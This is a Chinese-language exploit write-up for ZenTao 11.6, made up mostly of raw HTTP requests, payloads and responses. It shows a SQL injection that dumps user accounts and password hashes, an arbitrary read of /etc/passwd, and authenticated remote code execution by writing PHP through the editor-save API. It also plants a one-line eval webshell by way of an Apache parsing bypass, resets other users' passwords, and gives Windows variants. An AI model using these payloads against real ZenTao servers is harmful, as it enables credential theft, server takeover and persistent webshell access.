测试环境:V11.6
#SQL注入
http://127.0.0.1/zentao/api-getModel-api-sql-sql=select+account,password+from+zt_user
{"status":"success","data":"[{\"account\":\"admin\",\"password\":\"e64b78fc3bc91bcbc7dc232ba8ec59e0\"}]","md5":"c574c2dcc413d3f52b5fc6356ecae1fb"}
#任意文件读取
http://127.0.0.1/zentao/api-getModel-file-parseCSV-fileName=/etc/passwd
顺便一提,如果针对的是禅道本身,\xampp\tmp路径下会缓存许多很敏感的序列化之后的信息,可以留意下。
#RCE
需要至少普通用户权限。
Linux
- POC:
#requests
POST /zentao/api-getModel-editor-save-filePath=/tmp/123 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: lang=zh-cn; device=desktop; theme=default; windowWidth=2426; windowHeight=796; zentaosid=vqruohhgn7qbhveakg04h9e267
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
fileContent=<?php phpinfo()?>
#response
HTTP/1.1 200 OK
Date: Wed, 10 Jun 2020 10:16:53 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Set-Cookie: lang=zh-cn; expires=Fri, 10-Jul-2020 10:16:53 GMT; Max-Age=2592000; path=/zentao/
Set-Cookie: device=desktop; expires=Fri, 10-Jul-2020 10:16:53 GMT; Max-Age=2592000; path=/zentao/
Set-Cookie: theme=default; expires=Fri, 10-Jul-2020 10:16:53 GMT; Max-Age=2592000; path=/zentao/
Vary: Accept-Encoding
Content-Length: 72
Connection: close
Content-Type: text/html; Language=UTF-8;charset=UTF-8
{"status":"fail","data":"null","md5":"37a6259cc0c1dae299a7866489dff0bd"}
http://127.0.0.1/zentao/api-getModel-api-getMethod-filePath=/tmp/123/1
- RCE:
fileContent=<?php system('whoami');?>
- 一句话:
fileContent=<?php file_put_contents('/opt/zbox/app/zentao/www/xxx.php.aaa', '<?php @eval($_REQUEST["x"]);?>');?>
http://127.0.0.1/zentao/api-getModel-api-getMethod-filePath=/tmp/123/1
http://127.0.0.1/zentao/xxx.php.aaa?x=phpinfo();
顺便写下错误的用法:
fileContent=<?php file_put_contents('/opt/zbox/app/zentao/www/xxx.php', '<?php @eval($_REQUEST["x"]);?>');?>
区别很明显,框架路由限制,php并不会解析,这里借助apache解析漏洞绕过。
- 重置其它用户密码:
fileContent=<?php file_put_contents('/opt/zbox/app/zentao/tmp/reset_5ee19b1707968.txt', '');?>
Windows
POST /zentao/api-getModel-editor-save-filePath=11111 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: lang=zh-cn; device=desktop; theme=default; windowWidth=2426; windowHeight=796; zentaosid=j06qtsnjdifluem52d7789g540
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
fileContent=<?php phpinfo()?>
http://172.19.1.1:88/zentao/api-getModel-api-getMethod-filePath=11111/1
与Linux的区别?这里可以看到路径没有像Linux一样使用绝对路径,测试发现Linux直接写文件,全盘都没find到,但是Windows下反倒绝对路径很难调整,使用相对路径会直接写到\xampp\zentao\module\api目录下,绝对路径可借助rcefileContent=<?php getcwd()?>获取。
其它操作参考Linux。
网友评论